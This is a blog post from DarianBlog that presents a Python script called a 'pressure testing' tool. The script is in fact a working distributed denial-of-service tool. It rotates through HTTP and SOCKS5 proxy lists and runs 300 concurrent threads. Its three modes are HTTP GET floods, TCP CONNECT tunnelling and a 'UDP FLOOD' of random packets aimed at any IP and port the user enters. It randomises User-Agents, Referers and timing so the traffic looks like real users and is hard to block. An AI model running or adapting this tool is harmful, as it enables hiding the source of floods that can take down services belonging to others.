banner
DarianBlog

DarianBlog

达里安博客-专注于技术分享与交流的博客。博客致力于创造一个简单而直接的技术学习平台。
email
telegram

Script for pressure testing using http or socks5 proxy

import requests
import concurrent.futures
import time
import os
import threading
import socket
import socks 
import random # NEW: Import random library to increase randomness

# --- Configuration parameters ---
# Proxy file path used in HTTP/TCP mode
INPUT_HTTP_PROXY_FILE = 'working_proxies.txt'
# Proxy file path used in UDP mode for SOCKS5
INPUT_SOCKS5_PROXY_FILE = 'working_socks5_proxies.txt' 
# Timeout for a single request (seconds)
TIMEOUT = 10 
# Maximum number of concurrent threads (should be set high to achieve maximum traffic)
MAX_WORKERS = 300 
# Random delay range for task submission (seconds). For example, 0.005 to 0.05 seconds to simulate irregular click intervals.
MIN_SUBMISSION_DELAY = 0.005 
MAX_SUBMISSION_DELAY = 0.05
# ------------------

# Thread-safe counters
success_count = 0
fail_count = 0
lock = threading.Lock()

# Dynamically configured variables (set by user input at runtime)
TARGET_HOST = None 
TARGET_PORT = None
TARGET_URL = None
ACCESS_MODE = None
RUN_DURATION_SECONDS = 0 

# Common and real User-Agent list (to simulate different browsers)
USER_AGENTS = [
    'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36',
    'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 14.5; rv:127.0) Gecko/20100101 Firefox/127.0',
    'Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Mobile/15E148 Safari/604.1',
    'Mozilla/5.0 (iPad; CPU OS 17_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Mobile/15E148 Safari/604.1',
    'Mozilla/5.0 (Linux; Android 14) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Mobile Safari/537.36',
]

# Random Referer list (simulate request sources)
REFERERS = [
    'https://www.google.com/',
    'https://www.bing.com/',
    'https://duckduckgo.com/',
    'https://t.co/', # Simulate Twitter/X redirection
    'https://www.facebook.com/',
    'https://www.reddit.com/',
    'https://www.zhihu.com/',
    'https://t.cn/', # Simulate Weibo short link
    'https://news.baidu.com/',
    'http://localhost/', # Simulate internal link
    'https://www.wikipedia.org/'
]


def load_proxies(file_path):
    """Load proxy list from file, return IP:PORT list"""
    if not os.path.exists(file_path):
        print(f"❌ Error: Proxy file not found: {file_path}")
        return []
    
    with open(file_path, 'r') as f:
        proxies = [p.strip() for p in f.readlines() if p.strip()]
    
    if not proxies:
        print("❌ Error: No valid data in proxy file.")
    return proxies

def visit_target(proxy, request_id):
    """Access target URL via specified proxy or directly"""
    global success_count, fail_count, TARGET_URL, ACCESS_MODE, TIMEOUT, TARGET_HOST, TARGET_PORT
    
    if not ACCESS_MODE:
        with lock:
            fail_count += 1
        return
        
    # --- Mode 1: HTTP GET request (using requests) ---
    if ACCESS_MODE == 'HTTP_GET':
        if not TARGET_URL:
             with lock: fail_count += 1
             return
             
        try:
            proxy_ip, proxy_port = proxy.split(':')
        except ValueError:
            proxy_ip, proxy_port = "Invalid", 0
        
        proxies = {
            'http': f'http://{proxy}',
            'https': f'http://{proxy}',
        }
        
        # NEW: Randomize request headers
        headers = {
            'User-Agent': random.choice(USER_AGENTS), # Randomly select a User-Agent
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
            'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3', # Simulate accepting Chinese/English
            'Connection': 'keep-alive',
            'Upgrade-Insecure-Requests': '1',
            'Referer': random.choice(REFERERS) # NEW: Random Referer
        }
        
        try:
            # Send request
            response = requests.get(
                TARGET_URL, 
                proxies=proxies, 
                timeout=TIMEOUT,
                headers=headers, # Use randomized headers
                verify=False # Disable SSL verification
            )
            
            # Check response status code
            if response.status_code < 500: 
                with lock:
                    success_count += 1
            else:
                 with lock:
                    success_count += 1
                
        except requests.exceptions.RequestException:
            with lock:
                fail_count += 1
        except Exception:
            with lock:
                fail_count += 1

    # --- Mode 2: Raw TCP connection test (using socket) ---
    elif ACCESS_MODE == 'TCP_CONNECT':
        if not TARGET_HOST or not TARGET_PORT:
             with lock: fail_count += 1
             return
             
        try:
            proxy_ip, proxy_port = proxy.split(':')

            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.settimeout(TIMEOUT)
            
            # Attempt to connect to the proxy itself
            s.connect((proxy_ip, int(proxy_port)))
            
            # If connection is successful, attempt to send HTTP CONNECT request (establish tunnel)
            # Although it's a TCP connection, we can still randomize User-Agent to prevent some proxies from checking
            user_agent = random.choice(USER_AGENTS)
            connect_request = f"CONNECT {TARGET_HOST}:{TARGET_PORT} HTTP/1.1\r\nHost: {TARGET_HOST}\r\nUser-Agent: {user_agent}\r\n\r\n"
            s.sendall(connect_request.encode('utf-8'))
            
            # Receive response
            response = s.recv(4096).decode('utf-8')
            s.close()
            
            # Check if the proxy returns 200 Connection established
            if "200 Connection established" in response:
                 with lock:
                    success_count += 1
            else:
                with lock:
                    fail_count += 1

        except Exception:
            with lock:
                fail_count += 1
    
    # --- Mode 3: UDP FLOOD (send via SOCKS5 proxy) ---
    elif ACCESS_MODE == 'UDP_FLOOD':
        if not TARGET_HOST or not TARGET_PORT:
             with lock: fail_count += 1
             return
             
        try:
            # 1. Split SOCKS5 proxy information
            proxy_ip, proxy_port = proxy.split(':')
            
            # 2. Create SOCKS proxy socket (using SOCK_DGRAM for UDP)
            s = socks.socksocket(socket.AF_INET, socket.SOCK_DGRAM) 
            s.set_proxy(socks.SOCKS5, proxy_ip, int(proxy_port))
            s.settimeout(TIMEOUT)
            
            # Simple payload (1024 bytes)
            payload = os.urandom(1024) 
            
            # 3. Send packet. socks.sendto will forward through the SOCKS5 proxy's UDP relay
            s.sendto(payload, (TARGET_HOST, TARGET_PORT))
            s.close()
            
            with lock:
                success_count += 1
        except Exception:
            with lock:
                fail_count += 1
                
    else:
        # Mode error handling
        print(f"Warning: Invalid ACCESS_MODE: {ACCESS_MODE}")
        with lock:
            fail_count += 1


def batch_visit(proxies):
    """Execute concurrent access tasks in batches, lasting for a specified duration"""
    global ACCESS_MODE, success_count, fail_count, MAX_WORKERS, RUN_DURATION_SECONDS
    
    run_duration_seconds = RUN_DURATION_SECONDS
    start_time = time.time()
    end_time = start_time + run_duration_seconds
    
    total_requests_submitted = 0
    
    if len(proxies) == 0:
        print("No available proxies, unable to execute tasks. Program terminated.")
        return

    print(f"Starting continuous access task. Target duration: {run_duration_seconds / 60:.1f} minutes, Access mode: {ACCESS_MODE}, Concurrent count: {MAX_WORKERS}")
    
    stop_monitoring = threading.Event()
    
    def monitor_status():
        """Real-time monitoring of task status"""
        while not stop_monitoring.is_set():
            time.sleep(1) # Update every 1 second
            
            completed_tasks = success_count + fail_count
            elapsed_time = time.time() - start_time
            rps = completed_tasks / elapsed_time if elapsed_time > 0 else 0
            
            # Real-time progress output
            progress_line = (
                f"\r[Running] Duration: {elapsed_time:.1f}s / {run_duration_seconds}s | "
                f"Submitted: {total_requests_submitted} | Success: {success_count} | Fail: {fail_count} | RPS: {rps:.2f} req/s"
            )
            print(progress_line, end="", flush=True)

    monitor_thread = threading.Thread(target=monitor_status)
    monitor_thread.start()

    
    try:
        with concurrent.futures.ThreadPoolExecutor(max_workers=MAX_WORKERS) as executor:
            i = 0
            num_proxies = len(proxies)
            
            # Continuous submission loop
            while time.time() < end_time:
                # Loop through the proxy list
                proxy_to_use = proxies[i % num_proxies]
                
                # Submit task
                executor.submit(visit_target, proxy_to_use, i + 1)
                i += 1
                total_requests_submitted = i
                
                # NEW: Introduce random submission delay to simulate irregular user operations
                sleep_time = random.uniform(MIN_SUBMISSION_DELAY, MAX_SUBMISSION_DELAY)
                time.sleep(sleep_time) 
            
            # Task submission time ends
            print(f"\n[Time's up] Task submission stopped. Submitted {total_requests_submitted} requests. Waiting for ongoing tasks to complete...")
            
    finally:
        # Ensure monitoring thread stops
        stop_monitoring.set()
        if monitor_thread.is_alive():
             monitor_thread.join()
        
    # 3. Result summary
    end_time_final = time.time()
    total_time = end_time_final - start_time
    final_rps = (success_count + fail_count) / total_time if total_time > 0 else 0

    print("\n--- Task Summary ---")
    print(f"Total runtime: {total_time:.2f} seconds (including submission and cleanup periods)")
    print(f"Total requests submitted: {total_requests_submitted}")
    print(f"Successful accesses: {success_count}")
    print(f"Failures: {fail_count}")
    print(f"Average speed (RPS): {final_rps:.2f} requests/second")


if __name__ == '__main__':
    # 1. Initialize proxy list and mode
    working_proxies = []
    
    # --- Interactive configuration ---
    print("\n--- Access Mode Selection ---")
    print("1. HTTP/HTTPS GET request (access web services via HTTP proxy)")
    print("2. TCP CONNECT tunnel connection (connect IP:PORT via HTTP proxy)")
    print("3. UDP FLOOD (connect IP:PORT via SOCKS5 proxy)")
    
    mode_choice = input("Please select access mode (enter 1, 2, or 3): ").strip()
    
    # Load different proxy files based on mode
    if mode_choice == '1' or mode_choice == '2':
        working_proxies = load_proxies(INPUT_HTTP_PROXY_FILE)
        print(f"\nLoaded {len(working_proxies)} HTTP proxies.")
        if not working_proxies:
             print("HTTP/TCP mode requires a valid proxy list, but the list is empty. Program terminated.")
             exit()
             
    elif mode_choice == '3':
        working_proxies = load_proxies(INPUT_SOCKS5_PROXY_FILE)
        print(f"\nLoaded {len(working_proxies)} SOCKS5 proxies.")
        if not working_proxies:
             print("UDP_FLOOD mode requires a valid SOCKS5 proxy list, but the list is empty. Program terminated.")
             exit()

    else:
        print("Invalid input, program terminated.")
        exit()
        
    # --- Set mode and target ---
    if mode_choice == '1':
        ACCESS_MODE = 'HTTP_GET'
        TARGET_URL = input("Please enter target URL (e.g., http://httpbin.org/ip): ").strip() # Default target changed to httpbin

    elif mode_choice == '2':
        ACCESS_MODE = 'TCP_CONNECT'
        target_input = input("Please enter target IP:PORT (e.g., 192.168.1.1:8080): ").strip()
        
        try:
            TARGET_HOST, TARGET_PORT = target_input.split(':')
            TARGET_PORT = int(TARGET_PORT)
        except ValueError:
            print("Target format error. Please ensure the input format is IP:PORT. Program terminated.")
            exit()
             
    elif mode_choice == '3':
        ACCESS_MODE = 'UDP_FLOOD'
        target_input = input("Please enter target IP:PORT (e.g., 192.168.1.1:53): ").strip()

        try:
            TARGET_HOST, TARGET_PORT = target_input.split(':')
            TARGET_PORT = int(TARGET_PORT)
        except ValueError:
            print("Target format error. Please ensure the input format is IP:PORT. Program terminated.")
            exit()
        
    # --- Set runtime ---
    try:
        duration_minutes = input("Please enter continuous access duration (minutes, e.g., 5): ").strip()
        RUN_DURATION_SECONDS = int(duration_minutes) * 60
        if RUN_DURATION_SECONDS <= 0:
            print("Duration must be greater than 0, program terminated.")
            exit()
    except ValueError:
        print("Invalid duration input, program terminated.")
        exit()

    print(f"Target: {TARGET_HOST}:{TARGET_PORT}" if ACCESS_MODE != 'HTTP_GET' else f"Target URL: {TARGET_URL}")
    
    # 2. Batch concurrent access
    batch_visit(working_proxies)

Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.